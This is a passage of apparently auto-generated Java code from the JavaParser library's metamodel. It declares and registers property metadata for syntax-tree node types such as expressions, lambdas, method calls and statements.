variableDeclaratorMetaModel.typePropertyMetaModel = new PropertyMetaModel(variableDeclaratorMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
variableDeclaratorMetaModel.getDeclaredPropertyMetaModels().add(variableDeclaratorMetaModel.typePropertyMetaModel);
commentMetaModel.contentPropertyMetaModel = new PropertyMetaModel(commentMetaModel, "content", java.lang.String.class, Optional.empty(), false, false, false, false, false);
commentMetaModel.getDeclaredPropertyMetaModels().add(commentMetaModel.contentPropertyMetaModel);
arrayAccessExprMetaModel.indexPropertyMetaModel = new PropertyMetaModel(arrayAccessExprMetaModel, "index", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
arrayAccessExprMetaModel.getDeclaredPropertyMetaModels().add(arrayAccessExprMetaModel.indexPropertyMetaModel);
arrayAccessExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(arrayAccessExprMetaModel, "name", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
arrayAccessExprMetaModel.getDeclaredPropertyMetaModels().add(arrayAccessExprMetaModel.namePropertyMetaModel);
arrayCreationExprMetaModel.elementTypePropertyMetaModel = new PropertyMetaModel(arrayCreationExprMetaModel, "elementType", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
arrayCreationExprMetaModel.getDeclaredPropertyMetaModels().add(arrayCreationExprMetaModel.elementTypePropertyMetaModel);
arrayCreationExprMetaModel.initializerPropertyMetaModel = new PropertyMetaModel(arrayCreationExprMetaModel, "initializer", com.github.javaparser.ast.expr.ArrayInitializerExpr.class, Optional.of(arrayInitializerExprMetaModel), true, false, false, false, false);
arrayCreationExprMetaModel.getDeclaredPropertyMetaModels().add(arrayCreationExprMetaModel.initializerPropertyMetaModel);
arrayCreationExprMetaModel.levelsPropertyMetaModel = new PropertyMetaModel(arrayCreationExprMetaModel, "levels", com.github.javaparser.ast.ArrayCreationLevel.class, Optional.of(arrayCreationLevelMetaModel), false, true, true, false, false);
arrayCreationExprMetaModel.getDeclaredPropertyMetaModels().add(arrayCreationExprMetaModel.levelsPropertyMetaModel);
arrayInitializerExprMetaModel.valuesPropertyMetaModel = new PropertyMetaModel(arrayInitializerExprMetaModel, "values", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
arrayInitializerExprMetaModel.getDeclaredPropertyMetaModels().add(arrayInitializerExprMetaModel.valuesPropertyMetaModel);
assignExprMetaModel.operatorPropertyMetaModel = new PropertyMetaModel(assignExprMetaModel, "operator", com.github.javaparser.ast.expr.AssignExpr.Operator.class, Optional.empty(), false, false, false, false, false);
assignExprMetaModel.getDeclaredPropertyMetaModels().add(assignExprMetaModel.operatorPropertyMetaModel);
assignExprMetaModel.targetPropertyMetaModel = new PropertyMetaModel(assignExprMetaModel, "target", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
assignExprMetaModel.getDeclaredPropertyMetaModels().add(assignExprMetaModel.targetPropertyMetaModel);
assignExprMetaModel.valuePropertyMetaModel = new PropertyMetaModel(assignExprMetaModel, "value", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
assignExprMetaModel.getDeclaredPropertyMetaModels().add(assignExprMetaModel.valuePropertyMetaModel);
binaryExprMetaModel.leftPropertyMetaModel = new PropertyMetaModel(binaryExprMetaModel, "left", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
binaryExprMetaModel.getDeclaredPropertyMetaModels().add(binaryExprMetaModel.leftPropertyMetaModel);
binaryExprMetaModel.operatorPropertyMetaModel = new PropertyMetaModel(binaryExprMetaModel, "operator", com.github.javaparser.ast.expr.BinaryExpr.Operator.class, Optional.empty(), false, false, false, false, false);
binaryExprMetaModel.getDeclaredPropertyMetaModels().add(binaryExprMetaModel.operatorPropertyMetaModel);
binaryExprMetaModel.rightPropertyMetaModel = new PropertyMetaModel(binaryExprMetaModel, "right", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
binaryExprMetaModel.getDeclaredPropertyMetaModels().add(binaryExprMetaModel.rightPropertyMetaModel);
booleanLiteralExprMetaModel.valuePropertyMetaModel = new PropertyMetaModel(booleanLiteralExprMetaModel, "value", boolean.class, Optional.empty(), false, false, false, false, false);
booleanLiteralExprMetaModel.getDeclaredPropertyMetaModels().add(booleanLiteralExprMetaModel.valuePropertyMetaModel);
castExprMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(castExprMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
castExprMetaModel.getDeclaredPropertyMetaModels().add(castExprMetaModel.expressionPropertyMetaModel);
castExprMetaModel.typePropertyMetaModel = new PropertyMetaModel(castExprMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
castExprMetaModel.getDeclaredPropertyMetaModels().add(castExprMetaModel.typePropertyMetaModel);
classExprMetaModel.typePropertyMetaModel = new PropertyMetaModel(classExprMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
classExprMetaModel.getDeclaredPropertyMetaModels().add(classExprMetaModel.typePropertyMetaModel);
conditionalExprMetaModel.conditionPropertyMetaModel = new PropertyMetaModel(conditionalExprMetaModel, "condition", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
conditionalExprMetaModel.getDeclaredPropertyMetaModels().add(conditionalExprMetaModel.conditionPropertyMetaModel);
conditionalExprMetaModel.elseExprPropertyMetaModel = new PropertyMetaModel(conditionalExprMetaModel, "elseExpr", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
conditionalExprMetaModel.getDeclaredPropertyMetaModels().add(conditionalExprMetaModel.elseExprPropertyMetaModel);
conditionalExprMetaModel.thenExprPropertyMetaModel = new PropertyMetaModel(conditionalExprMetaModel, "thenExpr", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
conditionalExprMetaModel.getDeclaredPropertyMetaModels().add(conditionalExprMetaModel.thenExprPropertyMetaModel);
enclosedExprMetaModel.innerPropertyMetaModel = new PropertyMetaModel(enclosedExprMetaModel, "inner", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
enclosedExprMetaModel.getDeclaredPropertyMetaModels().add(enclosedExprMetaModel.innerPropertyMetaModel);
fieldAccessExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.namePropertyMetaModel);
fieldAccessExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.scopePropertyMetaModel);
fieldAccessExprMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.typeArgumentsPropertyMetaModel);
fieldAccessExprMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
fieldAccessExprMetaModel.getDerivedPropertyMetaModels().add(fieldAccessExprMetaModel.usingDiamondOperatorPropertyMetaModel);
instanceOfExprMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(instanceOfExprMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
instanceOfExprMetaModel.getDeclaredPropertyMetaModels().add(instanceOfExprMetaModel.expressionPropertyMetaModel);
instanceOfExprMetaModel.typePropertyMetaModel = new PropertyMetaModel(instanceOfExprMetaModel, "type", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), false, false, false, false, true);
instanceOfExprMetaModel.getDeclaredPropertyMetaModels().add(instanceOfExprMetaModel.typePropertyMetaModel);
lambdaExprMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(lambdaExprMetaModel, "body", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
lambdaExprMetaModel.getDeclaredPropertyMetaModels().add(lambdaExprMetaModel.bodyPropertyMetaModel);
lambdaExprMetaModel.isEnclosingParametersPropertyMetaModel = new PropertyMetaModel(lambdaExprMetaModel, "isEnclosingParameters", boolean.class, Optional.empty(), false, false, false, false, false);
lambdaExprMetaModel.getDeclaredPropertyMetaModels().add(lambdaExprMetaModel.isEnclosingParametersPropertyMetaModel);
lambdaExprMetaModel.parametersPropertyMetaModel = new PropertyMetaModel(lambdaExprMetaModel, "parameters", com.github.javaparser.ast.body.Parameter.class, Optional.of(parameterMetaModel), false, false, true, false, false);
lambdaExprMetaModel.getDeclaredPropertyMetaModels().add(lambdaExprMetaModel.parametersPropertyMetaModel);
lambdaExprMetaModel.expressionBodyPropertyMetaModel = new PropertyMetaModel(lambdaExprMetaModel, "expressionBody", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
lambdaExprMetaModel.getDerivedPropertyMetaModels().add(lambdaExprMetaModel.expressionBodyPropertyMetaModel);
memberValuePairMetaModel.namePropertyMetaModel = new PropertyMetaModel(memberValuePairMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
memberValuePairMetaModel.getDeclaredPropertyMetaModels().add(memberValuePairMetaModel.namePropertyMetaModel);
memberValuePairMetaModel.valuePropertyMetaModel = new PropertyMetaModel(memberValuePairMetaModel, "value", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
memberValuePairMetaModel.getDeclaredPropertyMetaModels().add(memberValuePairMetaModel.valuePropertyMetaModel);
methodCallExprMetaModel.argumentsPropertyMetaModel = new PropertyMetaModel(methodCallExprMetaModel, "arguments", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
methodCallExprMetaModel.getDeclaredPropertyMetaModels().add(methodCallExprMetaModel.argumentsPropertyMetaModel);
methodCallExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(methodCallExprMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
methodCallExprMetaModel.getDeclaredPropertyMetaModels().add(methodCallExprMetaModel.namePropertyMetaModel);
methodCallExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(methodCallExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
methodCallExprMetaModel.getDeclaredPropertyMetaModels().add(methodCallExprMetaModel.scopePropertyMetaModel);
methodCallExprMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(methodCallExprMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
methodCallExprMetaModel.getDeclaredPropertyMetaModels().add(methodCallExprMetaModel.typeArgumentsPropertyMetaModel);
methodCallExprMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(methodCallExprMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
methodCallExprMetaModel.getDerivedPropertyMetaModels().add(methodCallExprMetaModel.usingDiamondOperatorPropertyMetaModel);
methodReferenceExprMetaModel.identifierPropertyMetaModel = new PropertyMetaModel(methodReferenceExprMetaModel, "identifier", java.lang.String.class, Optional.empty(), false, true, false, false, false);
methodReferenceExprMetaModel.getDeclaredPropertyMetaModels().add(methodReferenceExprMetaModel.identifierPropertyMetaModel);
methodReferenceExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(methodReferenceExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
methodReferenceExprMetaModel.getDeclaredPropertyMetaModels().add(methodReferenceExprMetaModel.scopePropertyMetaModel);
methodReferenceExprMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(methodReferenceExprMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
methodReferenceExprMetaModel.getDeclaredPropertyMetaModels().add(methodReferenceExprMetaModel.typeArgumentsPropertyMetaModel);
methodReferenceExprMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(methodReferenceExprMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
methodReferenceExprMetaModel.getDerivedPropertyMetaModels().add(methodReferenceExprMetaModel.usingDiamondOperatorPropertyMetaModel);
nameExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(nameExprMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
nameExprMetaModel.getDeclaredPropertyMetaModels().add(nameExprMetaModel.namePropertyMetaModel);
nameMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(nameMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
nameMetaModel.getDeclaredPropertyMetaModels().add(nameMetaModel.annotationsPropertyMetaModel);
nameMetaModel.identifierPropertyMetaModel = new PropertyMetaModel(nameMetaModel, "identifier", java.lang.String.class, Optional.empty(), false, true, false, false, false);
nameMetaModel.getDeclaredPropertyMetaModels().add(nameMetaModel.identifierPropertyMetaModel);
nameMetaModel.qualifierPropertyMetaModel = new PropertyMetaModel(nameMetaModel, "qualifier", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), true, false, false, false, false);
nameMetaModel.getDeclaredPropertyMetaModels().add(nameMetaModel.qualifierPropertyMetaModel);
normalAnnotationExprMetaModel.pairsPropertyMetaModel = new PropertyMetaModel(normalAnnotationExprMetaModel, "pairs", com.github.javaparser.ast.expr.MemberValuePair.class, Optional.of(memberValuePairMetaModel), false, false, true, false, false);
normalAnnotationExprMetaModel.getDeclaredPropertyMetaModels().add(normalAnnotationExprMetaModel.pairsPropertyMetaModel);
objectCreationExprMetaModel.anonymousClassBodyPropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "anonymousClassBody", com.github.javaparser.ast.body.BodyDeclaration.class, Optional.of(bodyDeclarationMetaModel), true, false, true, false, true);
objectCreationExprMetaModel.getDeclaredPropertyMetaModels().add(objectCreationExprMetaModel.anonymousClassBodyPropertyMetaModel);
objectCreationExprMetaModel.argumentsPropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "arguments", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
objectCreationExprMetaModel.getDeclaredPropertyMetaModels().add(objectCreationExprMetaModel.argumentsPropertyMetaModel);
objectCreationExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
objectCreationExprMetaModel.getDeclaredPropertyMetaModels().add(objectCreationExprMetaModel.scopePropertyMetaModel);
objectCreationExprMetaModel.typePropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "type", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), false, false, false, false, false);
objectCreationExprMetaModel.getDeclaredPropertyMetaModels().add(objectCreationExprMetaModel.typePropertyMetaModel);
objectCreationExprMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
objectCreationExprMetaModel.getDeclaredPropertyMetaModels().add(objectCreationExprMetaModel.typeArgumentsPropertyMetaModel);
objectCreationExprMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(objectCreationExprMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
objectCreationExprMetaModel.getDerivedPropertyMetaModels().add(objectCreationExprMetaModel.usingDiamondOperatorPropertyMetaModel);
simpleNameMetaModel.identifierPropertyMetaModel = new PropertyMetaModel(simpleNameMetaModel, "identifier", java.lang.String.class, Optional.empty(), false, true, false, false, false);
simpleNameMetaModel.getDeclaredPropertyMetaModels().add(simpleNameMetaModel.identifierPropertyMetaModel);
singleMemberAnnotationExprMetaModel.memberValuePropertyMetaModel = new PropertyMetaModel(singleMemberAnnotationExprMetaModel, "memberValue", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
singleMemberAnnotationExprMetaModel.getDeclaredPropertyMetaModels().add(singleMemberAnnotationExprMetaModel.memberValuePropertyMetaModel);
superExprMetaModel.classExprPropertyMetaModel = new PropertyMetaModel(superExprMetaModel, "classExpr", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
superExprMetaModel.getDeclaredPropertyMetaModels().add(superExprMetaModel.classExprPropertyMetaModel);
thisExprMetaModel.classExprPropertyMetaModel = new PropertyMetaModel(thisExprMetaModel, "classExpr", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
thisExprMetaModel.getDeclaredPropertyMetaModels().add(thisExprMetaModel.classExprPropertyMetaModel);
typeExprMetaModel.typePropertyMetaModel = new PropertyMetaModel(typeExprMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
typeExprMetaModel.getDeclaredPropertyMetaModels().add(typeExprMetaModel.typePropertyMetaModel);
unaryExprMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(unaryExprMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
unaryExprMetaModel.getDeclaredPropertyMetaModels().add(unaryExprMetaModel.expressionPropertyMetaModel);
unaryExprMetaModel.operatorPropertyMetaModel = new PropertyMetaModel(unaryExprMetaModel, "operator", com.github.javaparser.ast.expr.UnaryExpr.Operator.class, Optional.empty(), false, false, false, false, false);
unaryExprMetaModel.getDeclaredPropertyMetaModels().add(unaryExprMetaModel.operatorPropertyMetaModel);
unaryExprMetaModel.postfixPropertyMetaModel = new PropertyMetaModel(unaryExprMetaModel, "postfix", boolean.class, Optional.empty(), false, false, false, false, false);
unaryExprMetaModel.getDerivedPropertyMetaModels().add(unaryExprMetaModel.postfixPropertyMetaModel);
unaryExprMetaModel.prefixPropertyMetaModel = new PropertyMetaModel(unaryExprMetaModel, "prefix", boolean.class, Optional.empty(), false, false, false, false, false);
unaryExprMetaModel.getDerivedPropertyMetaModels().add(unaryExprMetaModel.prefixPropertyMetaModel);
variableDeclarationExprMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(variableDeclarationExprMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
variableDeclarationExprMetaModel.getDeclaredPropertyMetaModels().add(variableDeclarationExprMetaModel.annotationsPropertyMetaModel);
variableDeclarationExprMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(variableDeclarationExprMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
variableDeclarationExprMetaModel.getDeclaredPropertyMetaModels().add(variableDeclarationExprMetaModel.modifiersPropertyMetaModel);
variableDeclarationExprMetaModel.variablesPropertyMetaModel = new PropertyMetaModel(variableDeclarationExprMetaModel, "variables", com.github.javaparser.ast.body.VariableDeclarator.class, Optional.of(variableDeclaratorMetaModel), false, true, true, false, false);
variableDeclarationExprMetaModel.getDeclaredPropertyMetaModels().add(variableDeclarationExprMetaModel.variablesPropertyMetaModel);
variableDeclarationExprMetaModel.maximumCommonTypePropertyMetaModel = new PropertyMetaModel(variableDeclarationExprMetaModel, "maximumCommonType", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
variableDeclarationExprMetaModel.getDerivedPropertyMetaModels().add(variableDeclarationExprMetaModel.maximumCommonTypePropertyMetaModel);
importDeclarationMetaModel.isAsteriskPropertyMetaModel = new PropertyMetaModel(importDeclarationMetaModel, "isAsterisk", boolean.class, Optional.empty(), false, false, false, false, false);
importDeclarationMetaModel.getDeclaredPropertyMetaModels().add(importDeclarationMetaModel.isAsteriskPropertyMetaModel);
importDeclarationMetaModel.isStaticPropertyMetaModel = new PropertyMetaModel(importDeclarationMetaModel, "isStatic", boolean.class, Optional.empty(), false, false, false, false, false);
importDeclarationMetaModel.getDeclaredPropertyMetaModels().add(importDeclarationMetaModel.isStaticPropertyMetaModel);
importDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(importDeclarationMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
importDeclarationMetaModel.getDeclaredPropertyMetaModels().add(importDeclarationMetaModel.namePropertyMetaModel);
assertStmtMetaModel.checkPropertyMetaModel = new PropertyMetaModel(assertStmtMetaModel, "check", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
assertStmtMetaModel.getDeclaredPropertyMetaModels().add(assertStmtMetaModel.checkPropertyMetaModel);
assertStmtMetaModel.messagePropertyMetaModel = new PropertyMetaModel(assertStmtMetaModel, "message", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
assertStmtMetaModel.getDeclaredPropertyMetaModels().add(assertStmtMetaModel.messagePropertyMetaModel);
blockStmtMetaModel.statementsPropertyMetaModel = new PropertyMetaModel(blockStmtMetaModel, "statements", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, true, false, false);
blockStmtMetaModel.getDeclaredPropertyMetaModels().add(blockStmtMetaModel.statementsPropertyMetaModel);
breakStmtMetaModel.labelPropertyMetaModel = new PropertyMetaModel(breakStmtMetaModel, "label", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), true, false, false, false, false);
breakStmtMetaModel.getDeclaredPropertyMetaModels().add(breakStmtMetaModel.labelPropertyMetaModel);
catchClauseMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(catchClauseMetaModel, "body", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), false, false, false, false, false);
catchClauseMetaModel.getDeclaredPropertyMetaModels().add(catchClauseMetaModel.bodyPropertyMetaModel);
catchClauseMetaModel.parameterPropertyMetaModel = new PropertyMetaModel(catchClauseMetaModel, "parameter", com.github.javaparser.ast.body.Parameter.class, Optional.of(parameterMetaModel), false, false, false, false, false);
catchClauseMetaModel.getDeclaredPropertyMetaModels().add(catchClauseMetaModel.parameterPropertyMetaModel);
continueStmtMetaModel.labelPropertyMetaModel = new PropertyMetaModel(continueStmtMetaModel, "label", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), true, false, false, false, false);
continueStmtMetaModel.getDeclaredPropertyMetaModels().add(continueStmtMetaModel.labelPropertyMetaModel);
doStmtMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(doStmtMetaModel, "body", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
doStmtMetaModel.getDeclaredPropertyMetaModels().add(doStmtMetaModel.bodyPropertyMetaModel);
doStmtMetaModel.conditionPropertyMetaModel = new PropertyMetaModel(doStmtMetaModel, "condition", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
doStmtMetaModel.getDeclaredPropertyMetaModels().add(doStmtMetaModel.conditionPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.argumentsPropertyMetaModel = new PropertyMetaModel(explicitConstructorInvocationStmtMetaModel, "arguments", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
explicitConstructorInvocationStmtMetaModel.getDeclaredPropertyMetaModels().add(explicitConstructorInvocationStmtMetaModel.argumentsPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(explicitConstructorInvocationStmtMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
explicitConstructorInvocationStmtMetaModel.getDeclaredPropertyMetaModels().add(explicitConstructorInvocationStmtMetaModel.expressionPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.isThisPropertyMetaModel = new PropertyMetaModel(explicitConstructorInvocationStmtMetaModel, "isThis", boolean.class, Optional.empty(), false, false, false, false, false);
explicitConstructorInvocationStmtMetaModel.getDeclaredPropertyMetaModels().add(explicitConstructorInvocationStmtMetaModel.isThisPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(explicitConstructorInvocationStmtMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
explicitConstructorInvocationStmtMetaModel.getDeclaredPropertyMetaModels().add(explicitConstructorInvocationStmtMetaModel.typeArgumentsPropertyMetaModel);
explicitConstructorInvocationStmtMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(explicitConstructorInvocationStmtMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
explicitConstructorInvocationStmtMetaModel.getDerivedPropertyMetaModels().add(explicitConstructorInvocationStmtMetaModel.usingDiamondOperatorPropertyMetaModel);
expressionStmtMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(expressionStmtMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
expressionStmtMetaModel.getDeclaredPropertyMetaModels().add(expressionStmtMetaModel.expressionPropertyMetaModel);
foreachStmtMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(foreachStmtMetaModel, "body", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
foreachStmtMetaModel.getDeclaredPropertyMetaModels().add(foreachStmtMetaModel.bodyPropertyMetaModel);
foreachStmtMetaModel.iterablePropertyMetaModel = new PropertyMetaModel(foreachStmtMetaModel, "iterable", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
foreachStmtMetaModel.getDeclaredPropertyMetaModels().add(foreachStmtMetaModel.iterablePropertyMetaModel);
foreachStmtMetaModel.variablePropertyMetaModel = new PropertyMetaModel(foreachStmtMetaModel, "variable", com.github.javaparser.ast.expr.VariableDeclarationExpr.class, Optional.of(variableDeclarationExprMetaModel), false, false, false, false, false);
foreachStmtMetaModel.getDeclaredPropertyMetaModels().add(foreachStmtMetaModel.variablePropertyMetaModel);
forStmtMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(forStmtMetaModel, "body", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
forStmtMetaModel.getDeclaredPropertyMetaModels().add(forStmtMetaModel.bodyPropertyMetaModel);
forStmtMetaModel.comparePropertyMetaModel = new PropertyMetaModel(forStmtMetaModel, "compare", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
forStmtMetaModel.getDeclaredPropertyMetaModels().add(forStmtMetaModel.comparePropertyMetaModel);
forStmtMetaModel.initializationPropertyMetaModel = new PropertyMetaModel(forStmtMetaModel, "initialization", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
forStmtMetaModel.getDeclaredPropertyMetaModels().add(forStmtMetaModel.initializationPropertyMetaModel);
forStmtMetaModel.updatePropertyMetaModel = new PropertyMetaModel(forStmtMetaModel, "update", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
forStmtMetaModel.getDeclaredPropertyMetaModels().add(forStmtMetaModel.updatePropertyMetaModel);
ifStmtMetaModel.conditionPropertyMetaModel = new PropertyMetaModel(ifStmtMetaModel, "condition", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
ifStmtMetaModel.getDeclaredPropertyMetaModels().add(ifStmtMetaModel.conditionPropertyMetaModel);
ifStmtMetaModel.elseStmtPropertyMetaModel = new PropertyMetaModel(ifStmtMetaModel, "elseStmt", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), true, false, false, false, false);
ifStmtMetaModel.getDeclaredPropertyMetaModels().add(ifStmtMetaModel.elseStmtPropertyMetaModel);
ifStmtMetaModel.thenStmtPropertyMetaModel = new PropertyMetaModel(ifStmtMetaModel, "thenStmt", com.github.javaparser.ast.stmt.Statement.class, Optional.of(statementMetaModel), false, false, false, false, false);
ifStmtMetaModel.getDeclaredPropertyMetaModels().add(ifStmtMetaModel.thenStmtPropertyMetaModel);
ifStmtMetaModel.elseBlockPropertyMetaModel = new PropertyMetaModel(ifStmtMetaModel, "elseBlock", boolean.class, Optional.empty(), false, false, false, false, false);
ifStmtMetaModel.getDerivedPropertyMetaModels().add(ifStmtMetaModel.elseBlockPropertyMetaModel);
ifStmtMetaModel.thenBlockPropertyMetaModel = new PropertyMetaModel(ifStmtMetaModel, "thenBlock", boolean.class, Optional.empty(), false, false, false, false, false);
